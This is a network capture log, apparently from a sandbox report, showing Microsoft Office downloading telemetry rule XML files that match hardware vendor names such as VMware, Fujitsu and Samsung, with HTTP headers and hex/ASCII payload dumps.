2024-10-30 02:55:41 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
18192.168.2.55252513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:41 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:41 GMT
Content-Type: text/xml
Content-Length: 494
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB7010D66"
x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025541Z-16849878b78fssff8btnns3b1400000007kg00000000wn2z
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:41 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
19192.168.2.55252213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:41 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:41 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA41997E3"
x-ms-request-id: 6484a1a6-201e-0000-75a3-26a537000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025541Z-16849878b78wc6ln1zsrz6q9w8000000070g00000000r789
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:41 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session IDSource IPSource PortDestination IPDestination Port
20192.168.2.55252413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:41 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:41 GMT
Content-Type: text/xml
Content-Length: 464
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
ETag: "0x8DC582B97FB6C3C"
x-ms-request-id: 214ea441-b01e-00ab-0e9b-27dafd000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025541Z-15b8d89586fxdh48ft0acdbg44000000015g00000000azg1
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:41 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


Session IDSource IPSource PortDestination IPDestination Port
21192.168.2.55252813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:42 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:42 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:42 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
ETag: "0x8DC582B9DACDF62"
x-ms-request-id: 8d7929b6-101e-0017-6edc-2647c7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025542Z-17c5cb586f672xmrz843mf85fn00000006b0000000003te0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:42 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
22192.168.2.55252713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:42 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:42 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:42 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
ETag: "0x8DC582B9748630E"
x-ms-request-id: 7ca94a50-b01e-0021-3c90-28cab7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025542Z-r197bdfb6b46kmj4701qkq602400000006n000000000470k
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
23192.168.2.55252913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:42 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:42 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:42 GMT
Content-Type: text/xml
Content-Length: 404
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
ETag: "0x8DC582B9E8EE0F3"
x-ms-request-id: 4f99c795-b01e-0097-3bfd-274f33000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025542Z-15b8d89586fbmg6qpd9yf8zhm000000002bg000000007ye3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:42 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


Session IDSource IPSource PortDestination IPDestination Port
24192.168.2.55253013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:42 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:42 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:42 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
ETag: "0x8DC582B9C8E04C8"
x-ms-request-id: ebbbec6e-b01e-0021-1c83-29cab7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025542Z-r197bdfb6b4gx6v9pg74w9f47s00000009n00000000010bk
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:42 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
25192.168.2.55253113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:42 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:42 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:42 GMT
Content-Type: text/xml
Content-Length: 428
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
ETag: "0x8DC582BAC4F34CA"
x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025542Z-16849878b782d4lwcu6h6gmxnw000000072000000000hgqp
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:42 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination Port
26192.168.2.55253313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:43 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:43 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:43 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B988EBD12"
x-ms-request-id: 0124f848-201e-003f-38ad-246d94000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025543Z-15b8d89586f4zwgbgswvrvz4vs00000008q000000000fqz7
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:43 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session IDSource IPSource PortDestination IPDestination Port
27192.168.2.55253213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:43 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:43 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:43 GMT
Content-Type: text/xml
Content-Length: 499
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
ETag: "0x8DC582B98CEC9F6"
x-ms-request-id: de19335b-b01e-0098-4028-2acead000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025543Z-15b8d89586fxdh48ft0acdbg44000000016000000000apch
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:43 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
28192.168.2.55253513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:43 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:43 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:43 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB32BB5CB"
x-ms-request-id: 2760be74-301e-0096-200b-26e71d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025543Z-16849878b782d4lwcu6h6gmxnw00000006z000000000wesq
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:43 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
29192.168.2.55253613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:43 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:43 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:43 GMT
Content-Type: text/xml
Content-Length: 494
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8972972"
x-ms-request-id: 9969a17a-a01e-0021-051b-28814c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025543Z-r197bdfb6b4d9xksru4x6qbqr000000007fg00000000dvhm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
